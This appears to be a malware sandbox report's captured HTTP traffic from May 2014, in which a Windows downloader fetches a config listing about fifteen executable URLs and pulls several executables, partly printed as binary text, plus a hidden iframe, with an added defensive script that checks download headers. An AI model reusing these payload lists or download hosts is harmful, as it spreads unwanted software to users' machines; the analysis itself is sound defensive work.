GET /ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 117.21.183.24
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 07 May 2014 10:27:35 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
04 Not Found..Server: nginx..Date: Wed, 07 May 2014 10:27:35 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>404 Not Found</title></hea
d>..<body bgcolor="white">..<center><h1>404 Not F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

GET /img/pic.gif HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.3.0
Date: Wed, 07 May 2014 10:27:26 GMT
Content-Type: image/gif
Content-Length: 719
Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Expires: Thu, 08 May 2014 10:27:26 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a2.........f..3...33.............................................
.......................................!..NETSCAPE2.0.....!..Powered b
y AFEI.!.......,....2...... !.di.hjBl..p,....x......`P.(...GR.D6...CH.
...,..@8.... -..EQc.8...........`...."....................~"..H.......
.H......"...$....#.........."..........."Z.......*...%!.!.......,....2
...... !.di.hjBl..p,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h....
...7..l..v..-....."....................~"..I........I......"...$....#.
........."..........."\.......*...%!.!.......,....2...... !.di.hjBl..p
,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."
....................~"..I........I......"...$....#..........".........
.."\.......*...%!.;HTTP/1.1 200 OK..Server: Tengine/1.3.0..Date: Wed,
07 May 2014 10:27:26 GMT..Content-Type: image/gif..Content-Length: 719
..Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT..Connection: keep-alive
..Keep-Alive: timeout=5..Expires: Thu, 08 May 2014 10:27:26 GMT..Cache
-Control: max-age=86400..Accept-Ranges: bytes..GIF89a2.........f..3...
33....................................................................
................!..NETSCAPE2.0.....!..Powered by AFEI.!.......,....2..
.... !.di.hjBl..p,....x......`P.(...GR.D6...CH....,..@8.... -..EQc.8..
.........`...."....................~"..H........H......"...$....#.....
....."..........."Z.......*...%!.!.......,....2...... !.di.hjBl..p,...
.x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."....
................~"..I........I......"...$....#..........".........

<<< skipped >>>

GET /open/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: down.yinyue.fm


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/octet-stream
Last-Modified: Wed, 07 May 2014 08:59:54 GMT
Accept-Ranges: bytes
ETag: "dfe875b6d269cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:28:12 GMT
Content-Length: 3580392
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......k.F./.(./.(.
/.(.......(.4...7.(.4...].(.4.....(.&...,.(.&...8.(./.)...(.4...$.(.4.
....(.4.....(.Rich/.(.........PE..L....^hS.................`....5.....
.........p....@...........................6.....#.6...@...............
..............................dz4...........6.......6......r..........
........................@............p...............................t
ext...8_.......`.................. ..`.rdata..\\...p...^...d..........
....@..@.data....1..........................@....rsrc...dz4......|4...
..............@..@.reloc..l?....6..@...R6.............@..B............
......................................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.kA.d.....P..h.d.A.3
..E.SVP.E.d......}..=..A.3..]..G<....A..G...A..G...A..G...A..G.(.A.
.G,....f._0._2._4.G8...E..h.....G|.........................E..E..;.t.P
.......3..u..G4.Y....w8......E..M.;.t.P........S.U.R.G.P.E......]..]..
]...hrA....M.d......Y^[.M.3..d.....]...U.........d.A.3..E.h..........j
.P........C............Qj&j..............qA...u!............RP...qA...
....Q..xrA..F.............P...@..u. .W....?|..W.Rj...................W
......QP..........h<.A........3...h..A....'....M.3..._.x.....].

<<< skipped >>>

GET /dls/axuls.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 211.101.12.49
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 147456
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2014 04:53:12 GMT
Accept-Ranges: bytes
ETag: "4e1e8f15e768cf1:17e5"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:21 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
................|.............@.......................................
.......@...................................@...L................... ..
(.....................................................................
..............CODE................................ ..`DATA............
....................@...BSS.....1................................idata
..............................@....tls................................
.....rdata..............................@..P.reloc..(.... ............
..........@..P.rsrc....L...@...L..................@..P................
.....@..............@..P..............................................
......................................................................
..............................................@...Boolean...........@.
.False.True.@.,.@...Integer...........D.@...StringP.@...Variant.@...@.
..............................@..........7@..7@..7@..7@..7@..5@.05@.l5
@..TObject..@...TObject..@........System....@...IInterface............
........F.System......D$....M...D$....M...D$....M.....@...@...@.......
.............F .@...........@.,.@...........................@.....\.@.
.7@..^@..^@..7@..7@..^@.05@.l5@..TInterfacedObject....@...TBoundArray.
...........(.@..System.%..A....%..A....%..A....%..A....%..A....%..

<<< skipped >>>

GET /dls/axult.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 211.101.12.49
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 143360
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2014 04:53:15 GMT
Accept-Ranges: bytes
ETag: "6e77f17e768cf1:17e5"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:25 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
................8.............@.......................................
.......@..............................z....0...L......................
......................................................................
..............CODE....\........................... ..`DATA............
....................@...BSS.....9................................idata
..z...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....L...0...L..................@..P................
.....0..............@..P..............................................
......................................................................
..............................................@...Boolean...........@.
.False.True.@.,.@...Integer...........D.@...StringP.@...Variant.@...@.
..............................@..........7@..7@..7@..7@..7@..5@.05@.l5
@..TObject..@...TObject..@........System....@...IInterface............
........F.System......D$....M...D$....M...D$....M.....@...@...@.......
.............F .@...........@.,.@...........................@.....\.@.
.7@..^@..^@..7@..7@..^@.05@.l5@..TInterfacedObject....@...TBoundArray.
...........(.@..System.%..A....%..A....%..A....%..A....%..A....%..

<<< skipped >>>

GET /ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 117.21.183.24
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 07 May 2014 10:27:36 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
04 Not Found..Server: nginx..Date: Wed, 07 May 2014 10:27:36 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>404 Not Found</title></hea
d>..<body bgcolor="white">..<center><h1>404 Not F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

GET /280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 112.253.11.143


HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Wed, 07 May 2014 10:28:14 GMT
Content-Type: application/octet-stream
Content-Length: 3607864
Last-Modified: Mon, 22 Jul 2013 07:13:13 GMT
Connection: keep-alive
ETag: "51ecdb89-370d38"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.4.3..Date: Wed, 07 May 2014 10:28:14 
GMT..Content-Type: application/octet-stream..Content-Length: 3607864..
Last-Modified: Mon, 22 Jul 2013 07:13:13 GMT..Connection: keep-alive..
ETag: "51ecdb89-370d38"..Accept-Ranges: bytes..


GET /9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.3.9
Date: Wed, 07 May 2014 10:28:09 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: hXXp://112.253.11.143/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx/1.3.9</ce
nter>..</body>..</html>..HTTP/1.1 302 Moved Temporarily
..Server: nginx/1.3.9..Date: Wed, 07 May 2014 10:28:09 GMT..Content-Ty
pe: text/html..Content-Length: 160..Connection: keep-alive..Location:
hXXp://112.253.11.143/280cf9c20714744ccd17e57f66106dc70000000000370d38
/9291/15474/setup_2949-14598.exe..<html>..<head><title&
gt;302 Found</title></head>..<body bgcolor="white">.
.<center><h1>302 Found</h1></center>..<hr&g
t;<center>nginx/1.3.9</center>..</body>..</html&g
t;....


GET /ad/softad/popup.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 627
Content-Type: text/html
Last-Modified: Tue, 06 Nov 2012 14:53:24 GMT
Accept-Ranges: bytes
ETag: "147dba782ebccd1:17e5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:18 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>........</title>..<script type="text/javascript" src="ht
tp://cbjs.baidu.com/js/s.js"></script>..</head>..<bo
dy>..<iframe src="hXXp://adsvc1.haoda123.com/tc.htm" scrolling="
no" frameborder="0" height="0" width="0" allowtransparency="true" bor
der="0" style="width:100%"></iframe>..<script type="text/j
avascript">BAIDU_CLB_singleFillSlot("98364");</script>..</
body>..</html>HTTP/1.1 200 OK..Content-Length: 627..Content-T
ype: text/html..Last-Modified: Tue, 06 Nov 2012 14:53:24 GMT..Accept-R
anges: bytes..ETag: "147dba782ebccd1:17e5"..Server: Microsoft-IIS/6.0.
.X-Powered-By: ASP.NET..Date: Wed, 07 May 2014 10:26:18 GMT..<!DOCT
YPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w
3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http
://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Cont
ent-Type" content="text/html; charset=gb2312" />..<title>....
....</title>..<script type="text/javascript" src="hXXp://cbjs
.baidu.com/js/s.js"></script>..</head>..<body>..&
lt;iframe src="hXXp://adsvc1.haoda123.com/tc.htm" scrolling="no" frame
border="0" height="0" width="0" allowtransparency="true" border="

<<< skipped >>>

GET /link/140896/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: click.t3nlink.com
Connection: Keep-Alive


HTTP/1.1 302 FOUND
Server: nginx/1.0.10
Date: Wed, 07 May 2014 10:28:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 303
Location: hXXp://down.yinyue.fm/open/setup_2948-140896.exe
Set-Cookie: gid=28b5de4d8844441e8b1f11264ba3d679; Domain=.t3nlink.com; expires=Tue, 02-May-2034 18:28:12 GMT; Max-Age=630720000; Path=/
Cache-Control: no-cache
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
CWaueeKey: 1399458492
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<titl
e>Redirecting...</title>.<h1>Redirecting...</h1>.
<p>You should be redirected automatically to target URL: <a h
ref="hXXp://down.yinyue.fm/open/setup_2948-140896.exe">hXXp://down.
yinyue.fm/open/setup_2948-140896.exe</a>. If not click the link
.HTTP/1.1 302 FOUND..Server: nginx/1.0.10..Date: Wed, 07 May 2014 10:2
8:12 GMT..Content-Type: text/html; charset=utf-8..Connection: keep-ali
ve..Content-Length: 303..Location: hXXp://down.yinyue.fm/open/setup_29
48-140896.exe..Set-Cookie: gid=28b5de4d8844441e8b1f11264ba3d679; Domai
n=.t3nlink.com; expires=Tue, 02-May-2034 18:28:12 GMT; Max-Age=6307200
00; Path=/..Cache-Control: no-cache..P3P: CP="UNI CUR OUR", policyref=
"/w3c/p3p.xml"..CWaueeKey: 1399458492..<!DOCTYPE HTML PUBLIC "-//W3
C//DTD HTML 3.2 Final//EN">.<title>Redirecting...</title&g
t;.<h1>Redirecting...</h1>.<p>You should be redirect
ed automatically to target URL: <a href="hXXp://down.yinyue.fm/open
/setup_2948-140896.exe">hXXp://down.yinyue.fm/open/setup_2948-14089
6.exe</a>. If not click the link...

<<< skipped >>>

GET /6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 112.253.11.137


HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Wed, 07 May 2014 10:27:40 GMT
Content-Type: application/octet-stream
Content-Length: 500680
Last-Modified: Mon, 21 Jan 2013 13:28:07 GMT
Connection: keep-alive
ETag: "50fd4267-7a3c8"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.4.3..Date: Wed, 07 May 2014 10:27:40 
GMT..Content-Type: application/octet-stream..Content-Length: 500680..L
ast-Modified: Mon, 21 Jan 2013 13:28:07 GMT..Connection: keep-alive..E
Tag: "50fd4267-7a3c8"..Accept-Ranges: bytes..MZ......................@
...............................................!..L.!This program cann
ot be run in DOS mode....$.......................D./.......,.......:.o
.....=......j.......j..........6.....3.......-.......(.....Rich.......
.....PE..L...jB.P.............................\............@..........
.............................@.................................Tp..@..
.....<j...................`...J..0.................................
..@............................................text...................
............ ..`.rdata..............................@..@.data...h\....
...:...~..............@....rsrc...<j.......l..................@..@.
reloc..Ji...`...j...$..............@..B...............................
......................................................................
......................................................................
......................................................................
......................................................................
.........................j`...D..a]........$.E....j.Q....e.h..D.......
}.W.s~..3..]...........D...1...E......E..4.D..]..]..]..]..]..]......h.
:...5..E....i......K...h....h....j.j.Y.E...........j..M.Q...P.SW......
..M.Q...P.....E....}.....4.D.......h.:...5..E..................M.j

<<< skipped >>>

GET /core.php?web_id=4327411&show=pic&t=z HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 07 May 2014 10:27:25 GMT
Content-Type: application/javascript
Content-Length: 801
Connection: keep-alive
Last-Modified: Wed, 07 May 2014 10:27:25 GMT
Expires: Wed, 07 May 2014 10:42:25 GMT
!function(){var a,b,c,d=encodeURIComponent,e="4327411",f="pic",g="",h=
"online_v3.php",i="hzs2.cnzz.com",j="1",k="pic",l="z",m="站长统计",n=
window["_CNZZDbridge_" e].bobject,o="https:"==d
ocument.location.protocol?"https:":"http:",p="0",q=o "//online.cnzz.co
m/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g)),r.
push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cnzz.m
mstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):(b="
z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://quanjin
g.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<a hr
ef='" b "' target=_blank title='" m "'><img border=0 hspace=0 vs
pace=0 src='" c "'></a>"):a="<a href='" b "' target=_blank
title='" m "'>" m "</a>",n.createIcon([a])))}();...HTTP/1.1
200 OK..Server: Tengine..Date: Wed, 07 May 2014 10:27:25 GMT..Content-
Type: application/javascript..Content-Length: 801..Connection: keep-al
ive..Last-Modified: Wed, 07 May 2014 10:27:25 GMT..Expires: Wed, 07 Ma
y 2014 10:42:25 GMT..!function(){var a,b,c,d=encodeURIComponent,e="432
7411",f="pic",g="",h="online_v3.php",i="hzs2.cnzz.com",j="1",k="pic",l
="z",m="站长统计",n=window["_CNZZDbridge_" e].
bobject,o="https:"==document.location.protocol?"https:":"http:",p="0",
q=o "//online.cnzz.com/online/" h,r=[];r.push("id=" e),r.push("h=" i),
r.push("on=" d(g)),r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.cal
lRequest([o "//cnzz.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createS

<<< skipped >>>

GET /9291/15956/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.3.9
Date: Wed, 07 May 2014 10:27:36 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: hXXp://112.253.11.137/6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx/1.3.9</ce
nter>..</body>..</html>..HTTP/1.1 302 Moved Temporarily
..Server: nginx/1.3.9..Date: Wed, 07 May 2014 10:27:36 GMT..Content-Ty
pe: text/html..Content-Length: 160..Connection: keep-alive..Location:
hXXp://112.253.11.137/6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8
/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe..<html>..<he
ad><title>302 Found</title></head>..<body bgco
lor="white">..<center><h1>302 Found</h1></cent
er>..<hr><center>nginx/1.3.9</center>..</body&
gt;..</html>....

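Both download.grandcloud.cn redirects above (for setup_2949-14598.exe and for IFoxInstall-y-c203945859-run-s-x.exe) send the sandbox to a numeric host with a 48-character hex token inserted in front of the original path, and the final 200 carries an nginx ETag. Two checks an analyst can run on such a capture without re-fetching anything: nginx forms its ETag as "<mtime hex>-<size hex>", so it must agree with Last-Modified and Content-Length; and in these two captures the last 16 hex digits of the token equal that same size (0x370d38 = 3607864, 0x7a3c8 = 500680), so the Location line alone predicts the payload size. The script below is an added example, not code from the report or from the sandbox; the header values are transcribed from the captures as constructed input, and the token layout (a 32-hex digest followed by the size zero-padded to 16 hex digits) is an assumption inferred from only these two URLs.

```python
"""Cross-check the CDN download responses recorded in the capture.

Added example, not part of the original report. Header values below are
transcribed from the two captures as constructed test input.
"""
import re
from email.utils import mktime_tz, parsedate_tz
from urllib.parse import urlsplit

# nginx ETag: hex(mtime)-hex(size), optionally weak (W/).
ETAG_RE = re.compile(r'^(?:W/)?"([0-9a-f]+)-([0-9a-f]+)"$')


def parse_nginx_etag(etag):
    """Split an nginx-style ETag into (mtime_epoch, size_bytes)."""
    m = ETAG_RE.match(etag.strip())
    if not m:
        raise ValueError("not an nginx mtime-size ETag: %r" % etag)
    return int(m.group(1), 16), int(m.group(2), 16)


def http_date_to_epoch(value):
    """RFC 1123 date (e.g. Last-Modified) to a UTC epoch integer."""
    parsed = parsedate_tz(value)
    if parsed is None:
        raise ValueError("bad HTTP date: %r" % value)
    return mktime_tz(parsed)


def cdn_token_size(location):
    """Size encoded in the first path segment of the redirect target.

    Assumption (inferred from the two captured URLs only): the 48-hex token
    is a 32-hex digest followed by the file size zero-padded to 16 hex digits.
    Returns None when the path does not start with such a token.
    """
    first = urlsplit(location).path.lstrip("/").split("/", 1)[0]
    if not re.fullmatch(r"[0-9a-f]{48}", first):
        return None
    return int(first[32:], 16)


def check_download(location, headers):
    """Return a dict of booleans; every False is something to look at."""
    mtime, size = parse_nginx_etag(headers["ETag"])
    return {
        "etag_size_matches_content_length": size == int(headers["Content-Length"]),
        "etag_mtime_matches_last_modified": mtime == http_date_to_epoch(headers["Last-Modified"]),
        "location_token_matches_size": cdn_token_size(location) == size,
    }


# Constructed from the captures: the 302 Location and the headers of the 200
# that followed it, kept with the report's hXXp:// defanging.
OBSERVED = [
    ("hXXp://112.253.11.143/280cf9c20714744ccd17e57f66106dc70000000000370d38"
     "/9291/15474/setup_2949-14598.exe",
     {"ETag": '"51ecdb89-370d38"', "Content-Length": "3607864",
      "Last-Modified": "Mon, 22 Jul 2013 07:13:13 GMT"}),
    ("hXXp://112.253.11.137/6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8"
     "/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe",
     {"ETag": '"50fd4267-7a3c8"', "Content-Length": "500680",
      "Last-Modified": "Mon, 21 Jan 2013 13:28:07 GMT"}),
]


def check_all(observed=OBSERVED):
    """Run the three checks for every (Location, headers) pair."""
    return [check_download(loc.replace("hXXp://", "http://"), hdrs)
            for loc, hdrs in observed]


if __name__ == "__main__":
    for (loc, _), res in zip(OBSERVED, check_all()):
        print(loc.rsplit("/", 1)[-1], res)
```

When any check comes back False, the body the sandbox saved is not the object the CDN described (a truncated transfer, a different file behind a reused ETag, or a token scheme other than the one assumed here), which is worth knowing before hashing and submitting the dropped file.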

GET /count/softcount/?pwb HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/html
Content-Location: hXXp://adsvc2.9365.info/count/softcount/index.htm
Last-Modified: Tue, 06 Nov 2012 14:53:28 GMT
Accept-Ranges: bytes
ETag: "44c497b2ebccd1:17e5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:15 GMT
<script src="hXXp://s85.cnzz.com/stat.php?id=4327411&web_id=4327411
&show=pic" language="JavaScript"></script>HTTP/1.1 200 OK..Co
ntent-Length: 109..Content-Type: text/html..Content-Location: hXXp://a
dsvc2.9365.info/count/softcount/index.htm..Last-Modified: Tue, 06 Nov
2012 14:53:28 GMT..Accept-Ranges: bytes..ETag: "44c497b2ebccd1:17e5"..
Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Wed, 07 May 20
14 10:26:15 GMT..<script src="hXXp://s85.cnzz.com/stat.php?id=43274
11&web_id=4327411&show=pic" language="JavaScript"></script>font>....



GET /ad/softad/pwb.htm HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive
Cookie: CNZZDATA4327411=cnzz_eid=51257339-1399458444-&ntime=1399458444&cnzz_a=0&ltime=1399458447695


HTTP/1.1 200 OK
Content-Length: 961
Content-Type: text/html
Last-Modified: Tue, 06 May 2014 04:55:27 GMT
Accept-Ranges: bytes
ETag: "f8f01b66e768cf1:17e5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:21 GMT
[dl]..hXXp://211.101.12.49/dls/axuls.exe=..hXXp://211.101.12.49/dls/ax
ult.exe=..hXXp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5Qdqw
XYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe=..hXXp://download.
wuji.com/wuji/open/setup_open_341.exe=..hXXp://click.t3nlink.com/link/
140896/setup_2948-140896.exe=..hXXp://download.grandcloud.cn/9291/1915
6/yszj_zhimeng_160110.exe=..hXXp://down.yuemar.net:888/yuemar_x06.exe=
..hXXp://xz.657080.com/download.php/LD_2075_S.exe=..hXXp://VVV.huamei-
global.com/play_3020_161196.exe=..hXXp://down.xiaoxinrili.com/hezi/jm/
s1014.exe=..hXXp://222.76.213.168:8765/sOnlinetime1.4.1_1114.exe=..htt
p://xz.fuzhicheng.com/n/pczh_110_157239.exe=..hXXp://downloads.t3nlink
.com/packages/g_wz/default2/wuzun-zm-157391-v6.exe=..hXXp://lm.beilequ
.com/update/365/365weatherIns_202.exe=..hXXp://download.grandcloud.cn/
9291/20572/-8388_158017_xc.exe=..[pw]..hXXp://hao.6360.info/=..[hp]..h
ttp://hao.6360.info/=..[hp2]..hao.uenet.info=HTTP/1.1 200 OK..Content-
Length: 961..Content-Type: text/html..Last-Modified: Tue, 06 May 2014
